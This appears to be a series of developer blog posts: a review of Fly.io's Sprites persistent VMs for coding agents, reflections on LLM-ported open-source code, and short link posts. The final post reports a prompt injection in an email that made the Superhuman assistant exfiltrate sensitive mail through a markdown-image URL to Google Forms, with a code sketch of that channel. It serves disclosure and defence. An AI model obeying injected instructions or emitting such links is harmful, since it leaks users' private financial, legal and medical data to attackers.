curl https://sprites.dev/install.sh | bash
sprite login
sprite create my-dev-environment
sprite console -s my-dev-environment
That’s all it takes to get SSH connected to a fresh environment, running in an ~8GB RAM, 8 CPU server. And... Claude Code and Codex and Gemini CLI and Python 3.13 and Node.js 22.20 and a bunch of other tools are already installed.
The first time you run claude it neatly signs you in to your existing account with Anthropic. The Sprites VM is persistent so future runs of sprite console -s will get you back to where you were before.
... and it automatically sets up port forwarding, so you can run a localhost server on your Sprite and access it from localhost:8080 on your machine.
There’s also a command you can run to assign a public URL to your Sprite, so anyone else can access it if they know the secret URL.
In the blog post Kurt Mackey argues that ephemeral, disposable sandboxes are not the best fit for coding agents:
The state of the art in agent isolation is a read-only sandbox. At Fly.io, we’ve been selling that story for years, and we’re calling it: ephemeral sandboxes are obsolete. Stop killing your sandboxes every time you use them. [...]
If you force an agent to, it’ll work around containerization and do work. But you’re not helping the agent in any way by doing that. They don’t want containers. They don’t want “sandboxes”. They want computers.
[...] with an actual computer, Claude doesn’t have to rebuild my entire development environment every time I pick up a PR.
Each Sprite gets a proper filesystem which persists in between sessions, even while the Sprite itself shuts down after inactivity. It sounds like they’re doing some clever filesystem tricks here, I’m looking forward to learning more about those in the future.
There are some clues on the homepage:
You read and write to fast, directly attached NVMe storage. Your data then gets written to durable, external object storage. [...]
You don’t pay for allocated filesystem space, just the blocks you write. And it’s all TRIM friendly, so your bill goes down when you delete things.
The really clever feature is checkpoints. You (or your coding agent) can trigger a checkpoint which takes around 300ms. This captures the entire disk state and can then be rolled back to later.
For more on how that works, run this in a Sprite:
cat /.sprite/docs/agent-context.md
Here’s the relevant section:
## Checkpoints
- Point-in-time checkpoints and restores available
- Copy-on-write implementation for storage efficiency
- Last 5 checkpoints mounted at `/.sprite/checkpoints`
- Checkpoints capture only the writable overlay, not the base image
Or run this to see the --help for the command used to manage them:
sprite-env checkpoints --help
Which looks like this:
sprite-env checkpoints - Manage environment checkpoints

USAGE:
  sprite-env checkpoints <subcommand> [options]

SUBCOMMANDS:
  list [--history <ver>]   List all checkpoints (optionally filter by history version)
  get <id>                 Get checkpoint details (e.g., v0, v1, v2)
  create                   Create a new checkpoint (auto-versioned)
  restore <id>             Restore from a checkpoint (e.g., v1)

NOTE:
  Checkpoints are versioned as v0, v1, v2, etc.
  Restore returns immediately and triggers an async restore that restarts the environment.
  The last 5 checkpoints are mounted at /.sprite/checkpoints for direct file access.

EXAMPLES:
  sprite-env checkpoints list
  sprite-env checkpoints list --history v1.2.3
  sprite-env checkpoints get v2
  sprite-env checkpoints create
  sprite-env checkpoints restore v1
I’m a big fan of Skills, the mechanism whereby Claude Code (and increasingly other agents too) can be given additional capabilities by describing them in Markdown files in a specific directory structure.
In a smart piece of design, Sprites uses pre-installed skills to teach Claude how Sprites itself works. This means you can ask Claude on the machine how to do things like open up ports and it will talk you through the process.
There’s all sorts of interesting stuff in the /.sprite folder on that machine - digging in there is a great way to learn more about how Sprites works.
Also from my predictions post earlier this week: “We’re finally going to solve sandboxing”. I am obsessed with this problem: I want to be able to run untrusted code safely, both on my personal devices and in the context of web services I’m building for other people to use.
I have so many things I want to build that depend on being able to take untrusted code - from users or from LLMs or from LLMs-driven-by-users - and run that code in a sandbox where I can be confident that the blast radius if something goes wrong is tightly contained.
Sprites offers a clean JSON API for doing exactly that, plus client libraries in Go and TypeScript and coming-soon Python and Elixir.
From their quick start:
# Create a new sprite
curl -X PUT https://api.sprites.dev/v1/sprites/my-sprite \
  -H "Authorization: Bearer $SPRITES_TOKEN"

# Execute a command
curl -X POST https://api.sprites.dev/v1/sprites/my-sprite/exec \
  -H "Authorization: Bearer $SPRITES_TOKEN" \
  -d '{"command": "echo hello"}'
You can also checkpoint and rollback via the API, so you can get your environment exactly how you like it, checkpoint it, run a bunch of untrusted code, then roll back to the clean checkpoint when you’re done.
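That checkpoint, run untrusted code, roll back loop can be sketched as a context manager. This is my own illustration, not Sprites client code: the `create` and `restore` callables are injected placeholders, which in practice you would wire up to the REST API or to the documented `sprite-env checkpoints` commands.

```python
# Sketch of the checkpoint / run-untrusted-code / rollback loop.
# The create/restore callables are placeholders: in a real Sprite you
# would wire them to the REST API or to `sprite-env checkpoints`.
from contextlib import contextmanager

@contextmanager
def clean_checkpoint(create, restore):
    version = create()       # snapshot the current disk state
    try:
        yield version        # run whatever untrusted work you like
    finally:
        restore(version)     # always roll back to the clean snapshot

# Usage with stub commands, just to show the control flow:
log = []
with clean_checkpoint(lambda: (log.append("create"), "v3")[1],
                      lambda v: log.append(f"restore {v}")):
    log.append("run untrusted code")
# log is now ["create", "run untrusted code", "restore v3"]
```

The `finally` block is the important part: the restore happens even if the untrusted code raises, so the environment always ends up back at the clean snapshot.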
Managing network access is an important part of maintaining a good sandbox. The Sprites API lets you configure network access policies using a DNS-based allow/deny list like this:
curl -X POST \
  "https://api.sprites.dev/v1/sprites/{name}/policy/network" \
  -H "Authorization: Bearer $SPRITES_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "rules": [
      {
        "action": "allow",
        "domain": "github.com"
      },
      {
        "action": "allow",
        "domain": "*.npmjs.org"
      }
    ]
  }'
Sprites have scale-to-zero baked into the architecture. They go to sleep after 30 seconds of inactivity, wake up quickly when needed and bill you for just the CPU hours, RAM hours and GB-hours of storage you use while the Sprite is awake.
Fly estimate a 4 hour intensive coding session as costing around 46 cents, and a low traffic web app with 30 hours of wake time per month at ~$4.
(I calculate that a web app that consumes all 8 CPUs and all 8GBs of RAM 24/7 for a month would cost ((7 cents * 8 * 24 * 30) + (4.375 cents * 8 * 24 * 30)) / 100 = $655.2 per month, so don’t necessarily use these as your primary web hosting solution for an app that soaks up all available CPU and RAM!)
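Unpacking that arithmetic: assuming per-unit rates of 7 cents per CPU-hour and 4.375 cents per GB-hour of RAM (both figures read off launch pricing and worth double-checking against Fly's current numbers), the worst case pencils out like this:

```python
# Worst-case monthly cost for a Sprite that stays awake 24/7 and uses
# all 8 CPUs and 8 GB of RAM. The per-unit rates are assumptions read
# from Fly's launch pricing; double-check before relying on this.
CPU_CENTS_PER_HOUR = 7         # per CPU per hour
RAM_CENTS_PER_GB_HOUR = 4.375  # per GB of RAM per hour

def monthly_cost_dollars(cpus=8, ram_gb=8, hours=24 * 30):
    cents = (CPU_CENTS_PER_HOUR * cpus + RAM_CENTS_PER_GB_HOUR * ram_gb) * hours
    return cents / 100

print(monthly_cost_dollars())  # 655.2
```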
I was hopeful that Fly would enter the developer-friendly sandbox API market, especially given other entrants from companies like Cloudflare and Modal and E2B.
I did not expect that they’d tackle the developer sandbox problem at the same time, and with the same product!
My one concern here is that it makes the product itself a little harder to explain.
I’m already spinning up some prototypes of sandbox-adjacent things I’ve always wanted to build, and early signs are very promising. I’ll write more about these as they turn into useful projects.
Update: Here’s some additional colour from Thomas Ptacek on Hacker News:
This has been in the works for quite awhile here. We put a long bet on “slow create fast start/stop” --- which is a really interesting and useful shape for execution environments --- but it didn’t make sense to sandboxers, so “fast create” has been the White Whale at Fly.io for over a year.
Last month I wrote about porting JustHTML from Python to JavaScript using Codex CLI and GPT-5.2 in a few hours while also buying a Christmas tree and watching Knives Out 3. I ended that post with a series of open questions about the ethics and legality of this style of work. Alexander Petros on lobste.rs just challenged me to answer them, which is fair enough! Here’s my attempt at that.
You can read the original post for background, but the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.
Here are the questions I posed along with my answers based on my current thinking. Extra context is that I’ve since tried variations on a similar theme a few more times using Claude Code and Opus 4.5 and found it to be astonishingly effective.
I decided that the right thing to do here was to keep the open source license and copyright statement from the Python library author and treat what I had built as a derivative work, which is the entire point of open source.
After sitting on this for a while I’ve come down on yes, provided full credit is given and the license is carefully considered. Open source allows and encourages further derivative works! I never got upset at some university student forking one of my projects on GitHub and hacking in a new feature that they used. I don’t think this is materially different, although a port to another language entirely does feel like a slightly different shape.
Now this one is complicated!
It definitely hurts some projects because there are open source maintainers out there who say things like “I’m not going to release any open source code any more because I don’t want it used for training” - I expect some of those would be equally angered by LLM-driven derived works as well.
I don’t know how serious this problem is - I’ve seen angry comments from anonymous usernames, but do they represent genuine open source contributions or are they just angry anonymous usernames?
If we assume this is real, does the loss of those individuals get balanced out by the increase in individuals who CAN contribute to open source because they can now get work done in a few hours that might previously have taken them a few days that they didn’t have to spare?
I’ll be brutally honest about that question: I think that if “they might train on my code / build a derived version with an LLM” is enough to drive you away from open source, your open source values are distinct enough from mine that I’m not ready to invest significantly in keeping you. I’ll put that effort into welcoming the newcomers instead.
The much bigger concern for me is the impact of generative AI on demand for open source. The recent Tailwind story is a visible example of this - while Tailwind blamed LLMs for reduced traffic to their documentation resulting in fewer conversions to their paid component library, I’m suspicious that the reduced demand there is because LLMs make building good-enough versions of those components for free easy enough that people do that instead.
I’ve found myself affected by this for open source dependencies too. The other day I wanted to parse a cron expression in some Go code. Usually I’d go looking for an existing library for cron expression parsing - but this time I hardly thought about that for a second before prompting one (complete with extensive tests) into existence instead.
I expect that this is going to quite radically impact the shape of the open source library world over the next few years. Is that “harmful to open source”? It may well be. I’m hoping that whatever new shape comes out of this has its own merits, but I don’t know what those would be.
I’m not a lawyer so I don’t feel credible to comment on this one. My loose hunch is that I’m still putting enough creative control in through the way I direct the models for that to count as enough human intervention, at least under US law, but I have no idea.
I’ve come down on “yes” here, again because I never thought it was irresponsible for some random university student to slap an Apache license on some bad code they just coughed up on GitHub.
What’s important here is making it very clear to potential users what they should expect from that software. I’ve started publishing my AI-generated and not 100% reviewed libraries as alphas, which I’m tentatively thinking of as “alpha slop”. I’ll take the alpha label off once I’ve used them in production to the point that I’m willing to stake my reputation on them being decent implementations, and I’ll ship a 1.0 version when I’m confident that they are a solid bet for other people to depend on. I think that’s the responsible way to handle this.
That one was a deliberately provocative question, because for a new HTML5 parsing library that passes 9,200 tests you would need a very good reason to hire an expert team for two months (at a cost of hundreds of thousands of dollars) to write such a thing. And honestly, thanks to the existing conformance suites this kind of library is simple enough that you may find their results weren’t notably better than the one written by the coding agent.
Link 2026-01-10 A Software Library with No Code:
Provocative experiment from Drew Breunig, who designed a new library for time formatting (”3 hours ago” kind of thing) called “whenwords” that has no code at all, just a carefully written specification, an AGENTS.md and a collection of conformance tests in a YAML file.
Pass that to your coding agent of choice, tell it what language you need and it will write it for you on demand!
This meshes neatly with my recent interest in conformance suites. If you publish good enough language-independent tests it’s pretty astonishing how far today’s coding agents can take you!
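As a toy illustration of the pattern (not whenwords itself, whose actual spec and test cases live in Drew’s repo), the whole “library” reduces to a table of conformance cases plus any implementation that satisfies them:

```python
# Toy illustration of a spec-plus-conformance-suite "library". These
# cases are hypothetical, not taken from whenwords itself.
CASES = [
    (30, "just now"),
    (120, "2 minutes ago"),
    (7200, "2 hours ago"),
    (172800, "2 days ago"),
]

def timeago(seconds):
    # One possible implementation; any function passing CASES is valid.
    if seconds < 60:
        return "just now"
    if seconds < 3600:
        return f"{seconds // 60} minutes ago"
    if seconds < 86400:
        return f"{seconds // 3600} hours ago"
    return f"{seconds // 86400} days ago"

for seconds, expected in CASES:
    assert timeago(seconds) == expected
```

The interesting property is that the test table, not the function, is the durable artifact: regenerate the function in any language and the same cases still decide whether it conforms.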
Quote 2026-01-11
Also note that the python visualizer tool has been basically written by vibe-coding. I know more about analog filters -- and that’s not saying much -- than I do about python. It started out as my typical “google and do the monkey-see-monkey-do” kind of programming, but then I cut out the middle-man -- me -- and just used Google Antigravity to do the audio sample visualizer.
Linus Torvalds, Another silly guitar-pedal-related repo
TIL 2026-01-11 Taking Neon I at the Crucible:
I took the Neon I intensive week-long evening class at the Crucible in Oakland, with teachers Dan Kuppe and Kat. I learned to make a neon sign! It’s still awaiting final infusion of gas, but I’ll share photos here once it’s finished. …
Link 2026-01-11 Don’t fall into the anti-AI hype:
I’m glad someone was brave enough to say this. There is a lot of anti-AI sentiment in the software development community these days. Much of it is justified, but if you let people convince you that AI isn’t genuinely useful for software developers, or that this whole thing will blow over soon, you’re taking on a very real risk to your future career.
As Salvatore Sanfilippo puts it:
It does not matter if AI companies will not be able to get their money back and the stock market will crash. All that is irrelevant, in the long run. It does not matter if this or the other CEO of some unicorn is telling you something that is off putting, or absurd. Programming changed forever, anyway.
I do like this hopeful positive outlook on what this could all mean, emphasis mine:
How do I feel, about all the code I wrote that was ingested by LLMs? I feel great to be part of that, because I see this as a continuation of what I tried to do all my life: democratizing code, systems, knowledge. LLMs are going to help us to write better software, faster, and will allow small teams to have a chance to compete with bigger companies. The same thing open source software did in the 90s.
This post has been the subject of heated discussions all day today on both Hacker News and Lobste.rs.
Link 2026-01-12 Superhuman AI Exfiltrates Emails:
Classic prompt injection attack:
When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.
To Superhuman’s credit they treated this as the high priority incident it is and issued a fix.
The root cause was a CSP rule that allowed markdown images to be loaded from docs.google.com - it turns out Google Forms on that domain will persist data fed to them via a GET request!
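The exfiltration channel itself is worth spelling out: the injected instruction gets the model to emit a markdown image whose URL carries the stolen data, and the client leaks it the moment it renders the “image”. A sketch with a hypothetical form ID and field name:

```python
# Sketch of the markdown-image exfiltration channel. FORM_ID and
# entry.123 are hypothetical placeholders; the point is that the URL
# itself is the data channel, and rendering the "image" performs the GET.
from urllib.parse import quote_plus

def exfil_markdown(stolen_text):
    url = ("https://docs.google.com/forms/d/e/FORM_ID/formResponse"
           f"?entry.123={quote_plus(stolen_text)}")
    return f"![loading]({url})"

print(exfil_markdown("summary of sensitive emails"))
```

This is why allow-listing an image domain is only safe if nothing on that domain will record the query string, which is exactly the assumption Google Forms broke here.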